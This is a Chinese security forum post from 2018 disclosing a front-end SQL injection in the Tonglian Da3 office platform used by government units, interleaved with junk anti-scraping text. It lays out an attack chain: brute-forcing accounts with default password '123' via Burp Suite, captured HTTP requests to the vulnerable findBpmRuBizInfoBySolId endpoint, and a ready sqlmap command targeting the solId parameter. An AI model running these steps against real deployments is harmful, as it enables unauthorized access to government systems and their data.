找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1355|回复: 0
打印 上一主题 下一主题

同联Da3协同办公平台前台通用sql injection漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:15:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

( W2 ]2 o1 p: i* m5 v+ X% e3 M
) x" _9 U# q+ c8 V% k5 b

( E7 R6 r5 F8 N! A; ~+ g2 @

& n0 u: N# x" I" a. l' a 平台简介:. O& H3 Y8 H* Z) n3 [1 E

& m; Y8 O0 O# I8 H3 M

0 x5 ]8 B5 W1 P6 p* L3 Q  : V) U0 k& d2 H) g! z& k! ?

0 h1 L1 _ K6 f* x; A3 n

& t6 v" P& {* e3 ^5 Q 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
$ l* q; [) \* G% p q0 J 同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
) G$ ], T# L8 o3 ?5 U同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献! # N, i3 q$ e3 F: z

4 y1 w+ a9 e/ h) C* `

' O/ i% t+ r* G9 ?8 l  % m8 Q+ G" U9 b1 P% M" W* B

1 W; z/ Z, P7 W& k1 i p4 B8 L3 x% ]

6 J# y' D) b) x( g, K 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址: / j% w$ f3 V( T/ Y' J# h, I9 Z+ ?

8 Z. Y/ m, T6 f3 e3 ^- y# O

+ s# M$ Q: m: t3 ~$ T   ) |, w5 J5 O+ d4 K& K o: j) \

H1 P! k( N7 Z m

+ S: V. R/ u: q3 x2 N! x http://1.1.1.1:7197/cap-aco/#(案例2-) / k E! V, f- @* q3 F0 v# i) v& w

& N" q& O* K7 d* b7 Y: @) i

' n/ ~1 f M* J+ k! y9 X" S http://www.XXOO.com (案例1-官网网站) * J: \5 p7 f1 E' d* g- }. L

" v5 s# y8 ~0 G2 @2 U

1 H" G' F2 b7 C/ Y  * v, m) L- [) ~5 l+ r

7 z8 w4 T& m& N; Q

; Z6 X* C& x% ] ]: M1 i m# l4 d! | 漏洞详情: l0 ]1 f7 x- L& ? A2 g

0 @$ {& z0 i4 Z A) u

6 L: |* r" h# Q6 R( X6 Q/ e  初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试+ E5 T: y$ Z5 E

" m% I1 h1 N- X% w% J

7 G# ?- o& z- R1 H# `; {" v      首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:$ J6 n+ ?% `% Y1 L' L

+ ^1 O+ H& t) |" F9 h: V1 Z5 J

1 O) T% E2 V5 D) z& r N( N" V  4 v5 @) Z2 t: T$ p& q. E

, _- e0 P) }: N

7 v J2 |. W0 q5 S: c" W   ' _: g Q; } d5 p/ E

. P% G( H P8 E# d7 _! c' I

- D+ V7 ]$ D+ E8 \ status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:/ Z% P+ [; l. Y7 ?

+ B- e6 i* {1 a, f# d9 Y

& w C0 @. ^& D$ N' Y; [ 1、案例1-官方网站$ K% c4 ?$ ~5 b/ `

+ m% c2 W; k, E G& j7 X

/ |, O2 | k9 U7 p2 }( g GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1/ j Y. t# B4 f4 w# G, g, w) q; ~

% |3 o* E' z! ~6 g9 l- V, ~. U

0 c# a: J, n) D% P$ i9 d) J Host: www.XXOO.com ) w, v: [% X/ i* n6 F, i

8 f- Q1 o7 A5 a9 p k8 Y: n

" g+ O' Q/ R" y Proxy-Connection: Keep-Alive& W2 Z* @% M( C

s# {, z; V! K; w4 D; o3 C

$ M ^3 ?" t! ~+ J* g9 z R Accept: application/json, text/javascript, */*; q=0.01- i l1 l- X: s8 u0 Z1 \6 n

8 l2 c Z8 o9 Y# q7 z( Y6 Q

8 w& \7 a) o+ p% X! [* R Accept-Language: zh-CN1 M4 V; W# n# V( [; O- t% F9 S8 w& E

3 k* f I: H8 h0 D9 d: ] O

, [( w7 I- L# E5 H. | Content-Type: application/json 1 e+ X+ v: @) p/ F4 S. ]3 J5 [

S( G6 V$ W: f E! |# c4 q! i

( C4 ^* d$ U: h5 c! f# z, P User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko" X, U8 k3 | V& e# h6 n) A4 I7 Y8 L

# x- m+ f! |! W v

7 i* p- a" I g1 u X-Requested-With: XMLHttpRequest l# b" T4 ^2 x& m* f6 N/ X

' d3 |9 ~! H ~) M

- b( c. J7 V* G5 N1 U' E% a Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002, V3 o8 m0 ~! x# U! a3 m

0 g$ d+ f5 o! c& \! p' T

+ b0 ?, R$ o/ H5 J: ] Accept-Encoding: gzip, deflate, sdch! S4 o/ D, k0 k4 S& n) J4 R( `

' M( r! F1 n5 T [! X- `

. B1 }! p9 |) {# z Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e % H( R5 ]; `8 I0 `

2 f e/ Z. Q/ g* z9 s) ^9 O

! [* v/ M1 A9 B# ]9 x& A. _ 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图: ) O4 R6 v' }. N" \/ x$ o

( ?) ~- X# P5 U9 M$ W1 `; T

; n; H: K Z( N: u, V( d+ e  8 h/ `3 ~2 d% y& S, ]1 h

+ D/ l3 I/ K( v7 g% `% N

& V6 t# j& Z' t$ v ^& ^: Z6 o% e  / }5 G* {2 Q) f- P

* }% v; G; C7 {1 m7 M: D% J

1 S [6 H; _4 {   $ A) w0 W( O8 I! t( A! o! K

8 x% F( H+ A! E7 u$ a+ K

3 ^/ x! R; z8 B4 E- K/ U: V; V   1 Q+ k. i. S! s+ R

" ~! A: v9 Z! m% q

% G$ O" ]' \ u/ X   , T2 K4 x2 V: R2 F' ], K

' z# r( x, z' a1 V/ |

% x0 p% n l& Y 2、案例2-某天河云平台 " [. m2 A, k, d P

, L" n3 H* S+ Y$ d6 g6 R! U; s

) R" c7 D8 Q: o$ E GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1! R( `+ f3 ^% l9 ~# J" Y

2 S3 k _6 ^/ c' G- ^# b f4 k8 z2 K ^

. v2 X/ e7 ?: T r Host: 1.1.1.:7197 4 f; p! K, I8 }* n) Y# Z* c7 r. P k

9 @2 x' m( j) a9 E5 V

. v5 }. R1 B- g h: V4 N7 V2 t Accept: application/json, text/javascript, */*; q=0.016 r# E. ~# T& q' f& _3 [

, r d c% k1 d- V- B

0 s9 c; a* L( I/ k9 S+ }4 _ X-Requested-With: XMLHttpRequest! h R: `0 h- q6 ?. ^

$ v; Y3 H2 y; W% Z: r

: Y# t$ S* M; Q, @6 e% w4 O User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0) i" {0 z: f7 y# N& l

8 y, z! O, j6 f' p2 [- p" J

, V. U g3 Y- s9 e, D Content-Type: application/json1 r, f! O4 B! s. u8 ?1 R9 Y: P4 w

. o& `- J5 }( q2 _% R

/ Y3 n' M8 ~( s* m, [! K2 D Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008 5 ~/ g( d4 Q& p" C( o

" U+ K% I5 d- ]

6 Q0 I# f9 _ l2 Q: g Accept-Language: zh-CN,zh;q=0.8. i/ q S3 J# R- t: c4 M

9 l, B/ G7 w! ]

, q/ i" _, O) ?# @; l, o Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1 ; R2 e5 z: E" Q( L( w+ [$ \- q

# Q V5 ^* f8 R* i q5 t9 a" I

# ~+ U, y% U& U- R1 r Connection: close , I% b* A J! J, c+ X( D( ]

, J6 c% |! q* S1 o

9 f1 j4 W3 j5 o+ _7 D 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图: , Q% b' X3 \3 H) b1 P6 t& v' V

' m; G9 c; w& q5 B

6 m8 C8 L3 J; J. @$ z9 m1 V# t1 b   , [! W/ I5 e7 p; W

* {' m9 p9 Y- f4 f8 r* V6 G! j

$ w/ ^9 R0 ^! a- \
1 G+ A: _1 Z0 w

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表